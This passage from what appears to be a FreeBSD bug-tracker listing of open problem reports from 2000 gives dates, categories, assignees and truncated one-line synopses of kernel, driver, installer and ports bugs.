boot with SMP Dell 2400 o [2000/01/28] misc/16423 Installation problem of 3.4-RELEASE using o [2000/01/30] gnu/16481 Cpp crashes frequently o [2000/01/30] i386/16482 IDE disk fails on secondary IDE master de o [2000/02/06] kern/16515 Deadlock by ntpd o [2000/02/08] bin/16578 host-name field is hexadecimal instead of o [2000/02/08] conf/16586 net if down after fail during install o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/09] kern/16598 xmcd stopped by racd0c ioctl error while o [2000/02/09] kern/16605 samba 2.0.6 under 3.4-RELEASE can't open o [2000/02/09] ports/16621 marcel emulators/linux_base needs to be installe o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/10] bin/16645 Inetd(8) internal ident won't work with m o [2000/02/18] bin/16812 level 0 dump runs forever -- generates a o [2000/02/18] kern/16816 vop_stdpoll() in /sys/kern/vfs_default.c o [2000/02/20] conf/16832 amd.map options won't play with Solaris N o [2000/02/20] kern/16849 Close on an ide tape drive hangs o [2000/02/20] misc/16860 suggetion on installation process. o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/21] ports/16882 obrien Memory leak with g++ 2.8.1 and STL 2.8.1. o [2000/02/22] bin/16920 cdcontrol fails under 4.0-20000214-CURREN o [2000/02/23] kern/16937 ie0 not probed in -current of 2000-02-18 o [2000/02/23] conf/16948 murray Sysinstall/disklabel: bad partition table o [2000/02/23] ports/16955 markm 'pgp5' built with ports/security/pgp5 doe o [2000/02/25] ports/16983 ache procmail port not prefix clean o [2000/02/25] misc/16991 jhb booting install disk and USB o [2000/02/27] kern/17033 Samsung SN-124 ATAPI CD-ROM not supported o [2000/02/28] bin/17056 rshd does improper home directory check o [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/01] conf/17117 Dial-up problems when using Kppp o [2000/03/02] bin/17134 problem with 3.0-RELEASE cron forgetting o [2000/03/03] kern/17142 4.0-CURRENT hangs in ex_isa_identify() wh o [2000/03/03] kern/17146 panic in devfs_open() while mounting devi o [2000/03/03] kern/17153 mjacob Qlogic Ultra3 cards seem to write very sl o [2000/03/05] kern/17208 3.4 Lock-up during file-completion o [2000/03/06] i386/17228 Installation floppies hang up on Compaq A o [2000/03/06] misc/17235 endless loop? harddrive corrupted? o [2000/03/06] ports/17237 hosokawa in samba suite smbclient -M worked incorr o [2000/03/10] misc/17310 NIS host name resolving may loop forever o [2000/03/11] ports/17313 ache wu-ftpd ports install invalid file owners o [2000/03/11] ports/17314 hosokawa in samba: testparm incorrectly generate w o [2000/03/12] bin/17338 netstat shows down counting UDP delivery o [2000/03/12] i386/17346 APIC cannot be enabled without turning on o [2000/03/13] bin/17360 kris [PATCH] Cleanup bug in pam_ssh o [2000/03/14] i386/17374 Archive QIC02 tape-unit device randomly h o [2000/03/14] kern/17375 yokota kldload/unload cycles with syscons screen o [2000/03/15] kern/17393 kldload syscall allows the same kernel mo o [2000/03/16] kern/17403 cg CS4232 wont play w/newpcm o [2000/03/16] conf/17406 nis in /etc/host.conf breaks network prog f [2000/03/16] misc/17409 4.0-RELEASE install fails on Compaq 1850R o [2000/03/16] alpha/17410 alpha Bad tag on Alpha boot floppies o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/16] i386/17423 System hangs then reboots o [2000/03/17] gnu/17433 libobjc locks mutex before deallocating i o [2000/03/17] misc/17435 There's no DES crypto distribution in 4.0 o [2000/03/17] kern/17439 sos 4.0-STABLE: mount of non-fixated CD-R -> o [2000/03/18] bin/17482 ftpd(8) forget to close TCP port in passi o [2000/03/18] kern/17483 Cannot run disklabel on virgin disk o [2000/03/19] kern/17494 Two problems with the tun device o [2000/03/19] kern/17499 grog Can't revive VINUM RAID5 o [2000/03/20] ports/17503 obrien lsof port doesn't build on FreeBSD 5.0 o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load f [2000/03/21] i386/17526 PB of frequency heuristic in uipc_socket. o [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg o [2000/03/21] kern/17542 cg random static with GUS PnP o [2000/03/22] misc/17562 PAS16 sound cycles o [2000/03/23] misc/17567 make buildworld bombing at KerbIV o [2000/03/24] kern/17583 julian NETATALK code can corrupt mbuf free lists o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/24] kern/17592 sos ata READ/WRITE command timeouts o [2000/03/26] kern/17613 impossible to build FS KLD without kernel o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] kern/17634 cg Non-deterministic PnP sound device config o [2000/03/28] kern/17636 FreeBSD 4 uses network card driver dc whe s [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/28] ports/17652 stb netatalk port modification for des/md5 ch o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/29] kern/17680 Multiple crashes due to load in 4.0/5.0 e o [2000/03/30] kern/17695 cg Vibra16X sound card doesn't record audio o [2000/03/30] kern/17697 Boot floppy+local ftp upgrade from 3.4/in o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/03/31] kern/17715 io memory requests from pnp devices lands o [2000/04/01] kern/17738 reboot after panic: softdep_lock: locking o [2000/04/01] kern/17746 sos afd0 is accessed for no reason a couple o o [2000/04/02] i386/17755 FTP install of 4.0 allocates too few inod o [2000/04/02] kern/17757 deischen select returns 0 if pthread_kill'd w/ sig o [2000/04/02] i386/17761 disk label editor in 4.0 deleted 3.4 part o [2000/04/03] kern/17779 ADIC 1200d (DAT changer) and Symbios SCSI o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa o [2000/04/06] kern/17829 The dc driver is seriously broken o [2000/04/06] misc/17832 Enlightenment gives Segmentation fault a [2000/04/06] kern/17839 sos ad driver and SMP kernel panic (vinum may o [2000/04/07] bin/17841 ttyp0 (and only 0!) produces stdout input o [2000/04/07] kern/17842 Erratic user time reports for long runnin o [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m o [2000/04/07] kern/17844 Amd wedges every morning since I've upgra o [2000/04/08] kern/17863 Running DAP reboots computer o [2000/04/08] kern/17871 starting to accumulate undeletable direct o [2000/04/09] i386/17883 4.0-RELEASE panics during install. o [2000/04/09] i386/17890 sos Still having trouble identifying disk geo o [2000/04/10] kern/17895 stale unix domain connections o [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/10] i386/17915 pcm0 direct DMA issues. o [2000/04/10] kern/17920 sos ata/ad driver HARD ERROR failure with int o [2000/04/10] kern/17923 cg SB16 ISA-PnP sometimes produces loud stat o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/11] i386/17930 wpaul Patch to MFC WaveLAN WEP into 3.4-STABLE o [2000/04/11] kern/17936 panic: resource_list_alloc: resource entr o [2000/04/11] i386/17940 Cannot recongize the scsi card AIC-7899 o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 wpaul vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] ports/18003 cwt amanda2.4's SCSI changer script (chg-chio o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/15] kern/18024 when printing through gs: panic: lockmgr: o [2000/04/15] kern/18031 alpha system panics cpu_fork during AIO c o [2000/04/17] misc/18065 FREEBSD 4.0 crashes on boot Compaq Prolia o [2000/04/18] misc/18071 I cannot install Oracle 8i in FreeBSD 4.0 o [2000/04/19] i386/18089 4.0R install hangs on newfs or fsck o [2000/04/19] kern/18096 random crashes probably caused by lockmgr o [2000/04/20] kern/18110 DC-390 SCSI BIOS setting no effect and IB f [2000/04/20] kern/18113 Kernel panic while untarring a large arch o [2000/04/21] i386/18132 BTX dumps trying to boot w/ dedicated SCS o [2000/04/22] bin/18160 pppd does not hang up sometimes while sta o [2000/04/23] ports/18180 jmz xdm authorization fails with XDM-AUTHORIZ o [2000/04/23] bin/18181 Getty can fail to observe :de: specificat o [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot o [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex f [2000/04/25] i386/18212 4.0-RELEASE does not see all disk. o [2000/04/25] bin/18221 DNS resolver can fail for large DNS respo f [2000/04/26] kern/18234 phk 4.0-CURRENT crashes when "make test" in p o [2000/04/27] kern/18252 sysctl -a causes panic o [2000/04/28] i386/18268 RTC BIOS error10 (memorysize) o [2000/04/28] kern/18270 [PATCH] kldunload "vn" doesn't clean up e o [2000/04/28] kern/18285 the system froze when use scon -s 50 f [2000/04/29] kern/18303 grog panic: vinvalbuf: dirty bufs o [2000/04/30] kern/18315 System hang when doing back-to-back captu o [2000/04/30] kern/18316 close-together bt848/878 captures to file o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota kernel crash o [2000/05/18] kern/18650 panic when enabling linux with emu10k1 dr o [2000/05/19] gnu/18672 std::basic_string::c_str() o [2000/05/19] bin/18678 Bug in libz o [2000/05/19] kern/18687 mrouted and IPDIVERT cause a panic o [2000/05/20] kern/18704 GLOB_ERR not handled correctly by glob() o [2000/05/21] misc/18728 Audio and video desynch in Realplayer on s [2000/05/21] kern/18735 asmodai add support to Accton EN1217 network adap o [2000/05/22] bin/18742 times.allow field parsed incorrectly o [2000/05/22] kern/18751 if_dc doesn't autosense 100Mb mode o [2000/05/22] kern/18757 dg [PATCH] fxp driver doesn't enable flow co o [2000/05/22] kern/18763 kernel crashes when sysctl(3) is called o [2000/05/22] alpha/18768 wpaul Digital DE500-BA with "dc" driver doesn't f [2000/05/28] kern/18858 microuptime() errors even after disabling o [2000/05/28] misc/18860 Cannot write DATA record to /home/archive o [2000/05/29] kern/18869 4.0-Stable SMP kernel from 22. May unstab o [2000/05/29] kern/18875 arpintr() problem o [2000/05/30] kern/18899 if_vr.c can't bridging properly when bpf o [2000/05/30] bin/18903 pkg_add deleted its own database o [2000/05/31] kern/18924 sysctl hw.bt848 crashes machine (bktr dri o [2000/05/31] conf/18925 No X Desktop Environments in 4.0 o [2000/05/31] misc/18927 jwd Missing tools in release/scripts/src-inst o [2000/05/31] gnu/18930 obrien Fix mktemp() problem with libg2c o [2000/05/31] kern/18932 Total loss of ethernet needing reboot. P o [2000/06/01] i386/18940 Reading from stdin using linux-jdk-1.2.2 o [2000/06/02] kern/18980 ATAPI Drive boots Install CD but then say o [2000/06/03] i386/18981 3.4 CDROM fails to boot on Dell PowerEdge f [2000/06/04] kern/19009 Mounting bad CD-ROM causes crash o [2000/06/05] kern/19020 kernel reboots sometimes o [2000/06/05] misc/19025 Installer assumes /dev exists if target d f [2000/06/06] conf/19080 murray sysinstall's use of host.conf prevents ft o [2000/06/07] ports/19093 obrien problem with mail/muttzilla o [2000/06/08] kern/19121 IPv4 multicast does not work without rout o [2000/06/08] misc/19125 Undefined symbol `_poll' referenced from f [2000/06/12] kern/19219 le driver causes kernel panic during ifco o [2000/06/12] bin/19231 quota/mount commands inconsistency o [2000/06/12] ports/19232 ports port name changed and being updated o [2000/06/13] ports/19238 will sgmltools1 o [2000/06/13] i386/19245 -fexpensive-optimizations buggy (even wit o [2000/06/14] kern/19256 in devicedriver cy.c make_dev (..) probl o [2000/06/14] ports/19281 billf Error in ucd-snmp port with tkmib o [2000/06/16] kern/19347 top, CPU and SMP-problem in new kernel o [2000/06/17] bin/19357 swap info incorrect after using sysinstal o [2000/06/18] kern/19363 Do allow processes know about their file o [2000/06/19] bin/19375 makekey accepts only 8-byte password o [2000/06/19] misc/19376 ncurses alters buffering of stdin/stdout o [2000/06/19] kern/19389 Panic caused by sendfile(2) o [2000/06/19] bin/19393 programs using strftime () dump core if R o [2000/06/20] kern/19402 Signals 127 and 128 cannot be detected in o [2000/06/20] bin/19405 telnetd sends DO AUTHENTICATION even if a f [2000/06/20] kern/19407 Panic running linux binary on ext2fs o [2000/06/23] conf/19461 X authentication doesn't work off the CD o [2000/06/23] kern/19465 SYNC_CHACHE PROBREM: NEWTECH NDA20128A o [2000/06/23] kern/19479 processes stuck in 'ffsvgt' and 'FFS no' o [2000/06/23] kern/19482 Upgrade from 4.0-RELEASE to 4.0-STABLE ca o [2000/06/24] kern/19488 Bug in 4.0-STABLE (acting as a Bridging f o [2000/06/25] kern/19499 EtherExpress 16 is not probed o [2000/06/25] i386/19508 pci bus not probed for pci ethernet card f [2000/06/25] i386/19512 get problem in compile gcc-2.7.2.3 o [2000/06/26] ports/19518 jkoshy xli-1.17.0 fillscreen option paints white o [2000/06/27] conf/19542 Problem with Proxy o [2000/06/27] misc/19548 DES in 3.5-RELEASE allows trailing charac o [2000/06/27] misc/19557 Denying more than 10 ports with an 'open' a [2000/06/28] ports/19561 andreas Ghostscript 6 in ports refuses to build o [2000/06/28] conf/19569 stock IPFW rules have subtle udp hole o [2000/06/30] kern/19603 luigi 20 ethernet interfaces not compatible wit o [2000/06/30] docs/19604 steve Web query interface doesn't search or Ori o [2000/06/30] bin/19606 Telnet & Telnetd coredump when disabling o [2000/06/30] kern/19612 cg SBLive produces 75% static and 25% actual f [2000/06/30] kern/19614 johan missing blowfish in current kernel tree ( f [2000/06/30] kern/19615 cannot build current kernel (30-june-2000 f [2000/06/30] kern/19616 current kernel build failes on miibus o [2000/07/02] misc/19646 Level 0 dump takes way longer than it sho o [2000/07/02] kern/19654 wpaul 20 dc ports in one machine (5x 4port card o [2000/07/03] i386/19662 kernel panic after too many socket freed o [2000/07/03] kern/19672 dillon contigmalloc1() oddity for large alignmen o [2000/07/03] misc/19673 obrien dhclient-script will not always set the h o [2000/07/04] misc/19703 sos HTP366 ATA66 lockup with Fast ATA66 Drive o [2000/07/05] ports/19711 asami bsd.port.mk and autoconf are conflict o [2000/07/05] kern/19714 dillon swap_pager_getswapspace: failed o [2000/07/06] i386/19737 Cannot build a profiled kernel; load fail o [2000/07/07] bin/19773 [PATCH] telnet infinite loop depending on o [2000/07/08] bin/19789 sos [PATCH] msinfo reports incorrect data for o [2000/07/09] kern/19814 marcel Oracle8i installer triggers problem in th o [2000/07/10] i386/19820 Installation of Lotus Notes 5.0 for Linux o [2000/07/12] kern/19875 A new protocol family, PF_IPOPTION, to ha o [2000/07/12] kern/19880 Problem with configuring RS-232 multiport o [2000/07/13] misc/19909 dillon Problem with NFS client in 4.0-STABLE o [2000/07/14] bin/19935 obrien tcsh doesn't seem to pass control charcte o [2000/07/14] kern/19938 sos IDE tape drive (ast0) timeout too quick o [2000/07/15] bin/19946 possible bug in sh(1) with -p flag (privi o [2000/07/15] misc/19951 jmz moused has problems with XFree86 o [2000/07/16] ports/19967 obrien Update port: sysutils/lsof o [2000/07/17] misc/19994 sscanf() fails on 64-bit operations o [2000/07/17] kern/20001 small PicoBSD kernels fail to compile o [2000/07/18] kern/20016 jasone pthreads: Cannot set scheduling timer/Can o [2000/07/18] docs/20028 doc ASCII docs should reflect tags f [2000/07/19] kern/20035 sos Kernal Panik when try to install FreeBSD o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/21] kern/20086 imp The procedure in UPDATING misses install o [2000/07/22] kern/20115 cg pcm0 doesnot work on Panasonic Let's note o [2000/07/23] docs/20117 doc *printf manpage doesn't document %n o [2000/07/24] ports/20156 dirk 1.6.2.2 has some nasty bugs o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/26] bin/20194 amd doesn't provide directories automatic o [2000/07/27] misc/20210 4.1-RC crashes o [2000/07/27] kern/20213 NFS and Linuxulator issues in PR kern/194 o [2000/07/27] kern/20217 avalon IPF default block and inclusion in rc.net o [2000/07/27] bin/20220 unable to Ctrl-C (quit) when using "more" o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/28] alpha/20248 alpha DEFPA FDDI on alpha panics system o [2000/07/28] kern/20256 phk microuptime went backwards message keeps o [2000/07/28] bin/20259 des fetch(1) confused when redirected from ht o [2000/07/28] conf/20272 jkh Missing subdirs in the src/usr.sbin src p o [2000/07/29] conf/20282 murray sysinstall does not recover some /etc fil o [2000/07/30] kern/20299 cg Noise / Scratchiness in 4.1 SBLive driver f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons o [2000/08/01] kern/20340 cg SNDCTL_DSP_GETODELAY on pcm device is inc o [2000/08/02] kern/20361 In in.c:in_addmulti, missing splx when if o [2000/08/02] bin/20372 ftp login incorrect when s/key active but a [2000/08/02] bin/20373 obrien Setting breakpoints in shared objects bro o [2000/08/03] kern/20382 sos Panic when trying to mount non-fixated CD o [2000/08/04] ports/20401 ports lang/erlang skips the build of crypto.app o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, o [2000/08/09] ports/20503 sheldonh apache w/ mod_perl segfaults on 'use IO;' f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u f [2000/08/09] i386/20513 obrien Installation (over internet) does not wor o [2000/08/10] kern/20523 Support for PCI multiport cards for sio d o [2000/08/10] misc/20530 asmodai CMSG_DATA requires additional header file o [2000/08/12] ports/20564 ports [PATCH] nethack-gtk md5 correction, typo o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/13] ports/20581 ports current cdrecord port fails to install o [2000/08/14] bin/20591 src/usr.bin/file/MAINT & README & file.1 f [2000/08/14] gnu/20608 Problem by 'make world' from update 4.0-R o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] kern/20619 arpintr o [2000/08/15] kern/20631 kernel panics on ifconfig if_le f [2000/08/15] kern/20632 stacking mount_null causes an error: moun o [2000/08/15] bin/20633 jhb fdisk doesn't handle LBA correctly o [2000/08/16] bin/20646 dwmalone [PATCH] /bin/cp -p whines on set[ug]id im o [2000/08/16] ports/20656 dec Update port: net/gated (fix ports/19988) o [2000/08/16] ports/20663 andreas MD5 checksum mismatches for ports/databas o [2000/08/17] ports/20679 ports Port of Tcpview-1.0 o [2000/08/17] ports/20680 ports ports that don't have man pages with NO_I f [2000/08/17] i386/20685 fbsd 4.1-stable crashed when compiling st f [2000/08/17] misc/20687 murray FTP Install thru http proxy jumps to extr f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] ports/20705 ports xwave port fails to build o [2000/08/18] gnu/20707 obrien /usr/libexec/cpp doesn't support -undef f o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete o [2000/08/18] ports/20711 cwt amanda doesn't like the output from its c o [2000/08/20] bin/20725 Raw floppy writes fail for partial bytes. o [2000/08/20] kern/20734 n_hibma USB mouse detaches and never reataches o [2000/08/21] kern/20765 imp Crash in bdgtakeifaces when performing kl o [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/22] kern/20785 ru changing IP address on an interface may n o [2000/08/23] misc/20796 After "Waiting 15 seconds for SCSI device o [2000/08/24] ports/20819 ports XFMail 1.4.0 dumps core w/signal 6 when c o [2000/08/24] ports/20822 jmz [PATCH] PAM support broken in XDM o [2000/08/24] ports/20831 torstenb Autoconf Port: Bug introduced by patch-ag f [2000/08/25] i386/20833 On first boot, filesystem failed, startup o [2000/08/25] gnu/20835 markm Errno.pm is lost in perl system o [2000/08/25] kern/20842 dillon NFS client ignores read-only file setting o [2000/08/26] misc/20861 jasone libc_r does not honor socket timeouts o [2000/08/26] misc/20865 murray Installation auto default 50 MB root not o [2000/08/28] gnu/20912 obrien gdb does not recognise old executables. o [2000/08/28] ports/20913 ports ports not linking against -ljpeg o [2000/08/29] kern/20924 sos ata0-slave doesn't show up o [2000/08/29] i386/20925 doscmd(1) does not truncate a file int wr o [2000/08/29] kern/20933 sos ATAPI ZIP drive allows mounted disks to b o [2000/08/30] bin/20952 ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE f [2000/08/31] i386/20973 Probing error-------cannot install o [2000/09/01] ports/20986 reg Mozilla M17 installs incorrectly o [2000/09/02] ports/21002 stb setiathome port has problems under clean s [2000/09/03] ports/21014 will [PATCH] Fix for kdelibs2 PLIST s [2000/09/03] ports/21015 will [PATCH] Fix for kdebase2 PLIST a [2000/09/04] kern/21028 sheldonh Add Zoom V90 Internal modem support o [2000/09/04] ports/21055 ports popper3 dumps core o [2000/09/06] kern/21073 cg PCM sound driver silently accepts imprope o [2000/09/06] bin/21078 wpaul rtsol does not work on USB interface aue0 o [2000/09/06] i386/21087 tanimura ed driver incorrectly fails probe for ISA o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w o [2000/09/07] ports/21095 ports MASTER_SITES_GNU are semi-broken [PATCH] o [2000/09/08] ports/21116 ports vmware2 does not compile on -current o [2000/09/08] kern/21118 luigi Multiple problems in ipfw's stateful code f [2000/09/08] ports/21126 ports httpd warnings regarding attempts to free o [2000/09/08] kern/21131 Floppy causing cold boot in -STABLE o [2000/09/08] kern/21132 setting kern.hostid to 2887705710 fails. o [2000/09/08] bin/21133 sail driver dies o [2000/09/08] kern/21139 IBM DNES drives need 'quirk table' entry. o [2000/09/09] kern/21143 `#define schedsofttty' et al. should not o [2000/09/09] ports/21146 green [patch] openssh with LOGIN_CAP don't setu o [2000/09/09] bin/21152 @monthly entry in crontab is run every da o [2000/09/09] kern/21155 Load average (either with uptime both top o [2000/09/10] kern/21162 panic in ffs_softdep.c: handle_workitem_f o [2000/09/10] kern/21173 cg pcm "panic: no feed" with Creative SB AWE o [2000/09/10] kern/21175 peter ISA DMA channels 4-7 operate on wrong mem o [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi o [2000/09/11] ports/21210 dima acroread port missing lib a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/13] bin/21251 NIS problem - ypbind does loop in CLNT_BR o [2000/09/13] misc/21252 dhclient opens too many files o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21263 jseger Cannot use ImageMagick o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault s [2000/09/14] bin/21268 [MFC] user set no nobody is not good o [2000/09/14] kern/21270 Kernel compilation errors and dies when c o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] ports/21289 ports qpopauth doesn't work(qpopper ports) o [2000/09/15] bin/21292 ifconfig warn but does duplicate IP addre f [2000/09/15] kern/21294 des linprocfs:/proc/stat & /proc//stat d o [2000/09/15] i386/21297 kernel panic TRAP 18 during kern.flp inst o [2000/09/15] misc/21300 Install CD-ROMs don't give users enough r o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin o [2000/09/16] ports/21306 ports New ports: GB2JIS, a tool to convert GB t o [2000/09/16] ports/21319 ports ports submission - wmx10 o [2000/09/17] misc/21328 Should newer version of OS-BS be on CDROM o [2000/09/18] ports/21355 ports evg port fails to run - syntax error in a o [2000/09/18] ports/21360 ports kaffe port's PLIST file is inaccurate o [2000/09/18] kern/21363 cg Panic in pcm/channel.c when running RealP o [2000/09/18] bin/21375 obrien [PATCH] dhclient runs away on interface r o [2000/09/18] misc/21384 pcm driver has static in recorded audio o [2000/09/18] ports/21386 ports compile fails on -current o [2000/09/19] kern/21400 ata driver stealing IRQ15 on Compaq Proli o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites o [2000/09/20] ports/21416 ports Patch-ab for port emulators/xmame refer t o [2000/09/20] ports/21417 ports ports/news/trn/pkg/PLIST misses bin/inews o [2000/09/20] kern/21424 Blocking issue while regenerating aliases o [2000/09/20] kern/21429 box reboots with panic: pipeinit: cannot o [2000/09/20] gnu/21433 g++ optimiser produces bad code on right f [2000/09/20] ports/21437 bmah port update to correct mail/exmh2 support o [2000/09/21] ports/21448 ports msql2d.sh doesn't start the daemon o [2000/09/21] misc/21451 murray [PATCH] Release/Sysinstall documentation: o [2000/09/21] kern/21461 ISA PnP resource allocator problem o [2000/09/21] kern/21463 marcel Linux compatability mode should not allow o [2000/09/21] ports/21464 marcel linux_base port installs insecure glibc r a [2000/09/25] conf/21540 bp installworld panics for diskless clients o [2000/09/25] ports/21548 ports libcoro.a (ports) should use MAP_STACK wh o [2000/09/25] docs/21550 doc Some documents on Softupdates are not yet o [2000/09/25] ports/21554 marcel linux_base-6.1 incorrectly enables NIS by o [2000/09/26] i386/21559 rnordier BTX loader sometime show registers o [2000/09/26] misc/21583 CVS pserver - login succeeds but checkout o [2000/09/27] conf/21593 Whither cons25, or, cons25 causing intero o [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] i386/21624 trap in gusc_attach o [2000/09/28] kern/21625 yokota kernel hangs if SC_NO_FONT_LOADING define o [2000/09/28] kern/21631 4.1.1 Release and Stable don't detect my o [2000/09/28] bin/21637 [telnet] No address associated with hostn o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde o [2000/09/29] kern/21647 unable to boot 4.1-STABLE- with 4GB of RA o [2000/09/29] kern/21653 I need a AD1816 Driver o [2000/09/29] bin/21654 Re: nvi's -c flag does no do what it is d o [2000/09/29] ports/21656 ports PGP6 port based on pgp-6.5.8 a [2000/09/29] bin/21658 obrien The combination of dhclient & WinNT serve o [2000/09/30] bin/21660 crontab mishandles day range o [2000/10/01] kern/21674 Fujitsu MO drives M2513A don't like the s o [2000/10/01] kern/21676 CDROM drive not recognised during install o [2000/10/01] kern/21688 Kernel crash with Adaptec AAA-133 and ahc o [2000/10/02] kern/21693 cg hwptr went backwards 2112 -> 1312 o [2000/10/02] misc/21701 murray Keymap selection menu broken on initial i o [2000/10/02] docs/21708 doc kqueue/kevent man pages isn't specific ab o [2000/10/02] ports/21714 ports audio problem with nil o [2000/10/02] misc/21716 The site search results *suck*. o [2000/10/03] kern/21736 Source-tree broken, can't compile Kernel o [2000/10/04] i386/21743 ps pxeboot ignores NFS server IP address in o [2000/10/04] ports/21756 peter errors in Squid-2.3.4's configure prevent o [2000/10/04] ports/21761 peter Re: errors in Squid-2.3.4's configure pre o [2000/10/05] kern/21771 Fix for sppp and Cronyx drivers update o [2000/10/05] ports/21774 ports upgrading Boehm's Garbage Collector port o [2000/10/05] gnu/21779 patch(1)'s bug of new file creation o [2000/10/06] ports/21780 ports audio/vorbis should not depend on xmms! o [2000/10/06] ports/21784 andreas further improving the PostgreSQL port o [2000/10/06] kern/21791 Hang on FIN_WAIT_2 a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/07] i386/21824 bt driver no longer attaches due to chang o [2000/10/07] kern/21827 mount causes freebsd 4.1.1 to reboot o [2000/10/08] ports/21838 ports Updated port devel/sip o [2000/10/08] ports/21839 ports Updated port x11-toolkits/py-qt o [2000/10/08] bin/21840 small more(1) is less(1) and that should be on o [2000/10/09] kern/21860 The fix to TCP_ISSINCR after the bugtraq o [2000/10/09] kern/21864 Update Aironet stuff for WEP and fix "tcp o [2000/10/09] kern/21869 Compiling a a.out kernel on FreeBSD 4.0 o [2000/10/09] bin/21877 kris [PATCH] DSA support for pam_ssh o [2000/10/10] kern/21893 sos SiS 5591 (early revision) has broken UDMA o [2000/10/10] kern/21898 If options NFS is not in the kernel, moun o [2000/10/10] misc/21904 Fix for diskless startup bug in /etc/rc o [2000/10/11] bin/21918 Revision 1.5 provides incomplete fix for o [2000/10/12] bin/21934 jkh CVSupit install from /stand/sysinstall st o [2000/10/12] misc/21940 Modem Power-Off kills system o [2000/10/12] bin/21943 jasone pthreads: longjmp from signal handler jum o [2000/10/12] kern/21946 vm_fault when (accidentally) attempted to o [2000/10/13] ports/21951 ports ports/databases/db3: cannot configure o [2000/10/13] misc/21955 sos FreeBSD 4.1.1 does not recognize the slav o [2000/10/13] kern/21965 Running ldconfig (linux binary) from ld-1 s [2000/10/14] docs/21990 asmodai exec(3) manpage vs source inconsistency o [2000/10/15] misc/21997 asami after pkg_add 40upgrade-2000.08.25 telnet o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/15] i386/22006 quotacheck halt o [2000/10/15] ports/22010 ports Automatic build of windowmaker is broken o [2000/10/16] gnu/22025 markm perl does chmod in installworld o [2000/10/16] kern/22029 mckusick use of softdependencies leads to major fi o [2000/10/16] ports/22035 ports configure problem o [2000/10/16] ports/22036 ports StarOffice 5.2 CDROM install still fails o [2000/10/16] ports/22037 ports Missing shared xpm lib prevents windowmak o [2000/10/17] ports/22047 ports T3X port change request o [2000/10/17] ports/22048 ports TIDE port change request o [2000/10/17] kern/22063 brian bpf when used with the select system call o [2000/10/17] kern/22072 make kernel failed o [2000/10/18] kern/22078 Option ROM(s) must be excluded from ISA I o [2000/10/18] bin/22105 /usr/src/bin/sh - Permission denied when o [2000/10/19] misc/22111 Install 4.1.1 o [2000/10/19] kern/22142 securelevel does not affect mount o [2000/10/20] ports/22148 ports Can't make chipmunk port o [2000/10/20] conf/22151 source mechanism of /etc/rc.conf* files o [2000/10/20] i386/22153 make installworld error when upgrading fr o [2000/10/20] ports/22172 ports freetds port does not work to access MS-S o [2000/10/21] ports/22193 ports FreeBSD ports: 1 unfetchable distfiles: w o [2000/10/21] ports/22194 ports Update Makefile for misc/heyu o [2000/10/21] kern/22200 4.1.1-RELEASE can't mount CDROMS (negativ o [2000/10/22] misc/22206 sos FreeBSD4.1R boot floppy can't recognize 4 o [2000/10/22] bin/22212 skeyaccess(3) doesn't for primary group o [2000/10/22] kern/22225 Trying to build a CURRENT snapshot on 4.1 o [2000/10/22] ports/22226 ports python 2.0 port fails to compile o [2000/10/22] 